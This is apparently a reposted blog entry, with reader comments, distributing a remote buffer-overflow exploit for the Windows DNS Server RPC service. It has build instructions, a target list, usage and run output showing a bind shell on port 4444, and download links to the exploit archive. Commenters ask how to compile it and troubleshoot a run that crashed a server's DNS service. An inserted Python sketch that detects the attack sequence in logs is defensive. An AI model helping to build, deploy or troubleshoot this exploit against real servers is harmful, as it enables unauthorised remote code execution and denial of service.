MS Windows DNS RPC Remote Buffer Overflow Exploit (port 445) v2
鬼仔's note: V2
Some readers commented that they don't know how to compile it, so here is how to build it with the Makefile under VC:
Run cmd.exe
Change to the vc/bin directory
Run vcvars32.bat
Change to the directory containing the makefile
nmake /f makefile
Source: milw0rm
Exploit v2 features:
– Target Remote port 445 (by default but requires auth)
– Manual target for dynamic tcp port (without auth)
– Automatic search for dynamic dns rpc port
– Local and remote OS fingerprinting (auto target)
– Windows 2000 server and Windows 2003 server (Spanish) supported by default
– Fixed bug with Windows 2003 Shellcode
– Universal local exploit for Win2k (automatic search for opcodes)
– Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled)
– Added targets for remote Win2k English and Italian (not tested, found with the Metasploit opcode database; please report your own)
– Microsoft RPC api used ( who cares? :p )
D:\Programación\DNSTEST>dnstest
————————————————————–
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
————————————————————–
Usage: dnstest -h 127.0.0.1 (Universal local exploit)
dnstest -h host [-t id] [-p port]
Targets:
0 (0x30270b0b) – Win2k3 server SP2 Universal – (default for win2k3)
1 (0x79467ef8) – Win2k server SP4 Spanish – (default for win2k )
2 (0x7c4fedbb) – Win2k server SP4 English
3 (0x7963edbb) – Win2k server SP4 Italian
4 (0x41414141) – Windows all Denial of Service
D:\Programación\DNSTEST>dnstest.exe -h 192.168.1.2
————————————————————–
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
————————————————————–
[+] Trying to fingerprint target.. (05.02)
[+] Remote Host identified as Windows 2003
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp: 192.168.1.2
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105]
[+] Dynamic DNS rpc port found (1105)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105]
[+] RpcBindingFromStringBinding success
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444
also available at
http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip
http://www.48bits.com/exploits/dnsxpl.v2.1.zip
http://www.milw0rm.com/sploits/04172007-dnsxpl.v2.1.zip
# milw0rm.com [2007-04-18]
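The run transcript above shows the sequence a defender can look for: an endpoint-mapper lookup for the DNS server interface UUID, a bind to the dynamic port it resolves, and then either the DNS service dying or a connection to the bind-shell port 4444. The correlation below is an added example, not code from the milw0rm release or its authors; the log record format, hosts and timestamps are constructed, and the `admin_hosts` allow-list is an assumption about how legitimate remote DNS management would be distinguished.

```python
"""Added detection sketch (not the exploit's or milw0rm's code). Correlates
constructed log records for the sequence the run transcript shows: an
endpoint-mapper lookup for the DNS server RPC interface, an RPC bind to the
dynamic port that lookup resolved, then a DNS service crash or a connection
to the exploit's bind-shell port 4444."""

DNS_RPC_UUID = "50abc2a4-574d-40b3-9d66-ee4fd5fba076"  # DNS server interface UUID from the transcript
SHELL_PORT = 4444                                        # port the exploit tells you to connect to

# Constructed sample log, one record per line: "<ts> <kind> key=value ..." (format is an assumption)
SAMPLE_LOG = """\
10 epm_lookup src=192.168.1.50 dst=192.168.1.109 uuid=50abc2a4-574d-40b3-9d66-ee4fd5fba076
11 rpc_bind src=192.168.1.50 dst=192.168.1.109 port=1047
12 svc_crash host=192.168.1.109 service=DNS
13 tcp_connect src=192.168.1.50 dst=192.168.1.109 port=4444
20 epm_lookup src=10.0.0.7 dst=10.0.0.53 uuid=50abc2a4-574d-40b3-9d66-ee4fd5fba076
21 rpc_bind src=10.0.0.7 dst=10.0.0.53 port=1105
"""

def parse(line):
    """Turn one constructed log line into a dict with int 'ts' and 'kind'."""
    ts, kind, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"], rec["kind"] = int(ts), kind
    return rec

def detect(log_text, admin_hosts=frozenset(), window=60):
    """Return one alert string per suspicious (source, target) pair.

    A DNS-interface lookup from admin_hosts is treated as legitimate remote
    management; a lookup alone never alerts, only lookup+bind followed by a
    DNS crash within `window` seconds or a connection to SHELL_PORT."""
    lookups = {}   # (src, dst) -> ts of the DNS-interface lookup
    bound = set()  # (src, dst) pairs that went on to bind an RPC port
    alerts = []
    for rec in map(parse, log_text.splitlines()):
        key = (rec.get("src"), rec.get("dst"))
        if rec["kind"] == "epm_lookup" and rec["uuid"] == DNS_RPC_UUID and rec["src"] not in admin_hosts:
            lookups[key] = rec["ts"]
        elif rec["kind"] == "rpc_bind" and key in lookups:
            bound.add(key)
        elif rec["kind"] == "svc_crash" and rec["service"] == "DNS":
            for src, dst in bound:
                if dst == rec["host"] and rec["ts"] - lookups[(src, dst)] <= window:
                    alerts.append(f"DNS RPC lookup from {src} followed by DNS service crash on {dst}")
        elif rec["kind"] == "tcp_connect" and int(rec["port"]) == SHELL_PORT and key in bound:
            alerts.append(f"possible bind shell: {rec['src']} -> {rec['dst']}:{SHELL_PORT}")
    return alerts
```

The second host pair in the sample (lookup and bind only, no crash or shell connection) produces no alert, which is the behaviour you want for ordinary remote management traffic.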
How do I turn this into an .exe?
Easy: run midl on it, then nmake, and you're done.
How have you been lately, 鬼仔?
I've written the method into the post.
to enterbd: not bad, same as usual
:cry: couldn't get it to compile under VS8
Thanks :lol:
VS8?
Tested against the Chinese version of 2003; it gave the following:
E:\>dnstest -h 192.168.1.109
————————————————————–
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
————————————————————–
[+] Trying to fingerprint target.. (05.02)
[+] Remote Host identified as Windows 2003
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp:192.168.1.109
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.109[1047]
[+] Dynamic DNS rpc port found (1047)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.109[1047]
[+] RpcBindingFromStringBinding success
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444
[-] RPC Server reported exception 0x6be = 1726
[-] Looks like remote RPC server crashed :/
Also, the server's DNS service failed and port 53 is now closed. What is going on here? Please advise.
The overflow succeeded, but the connection failed.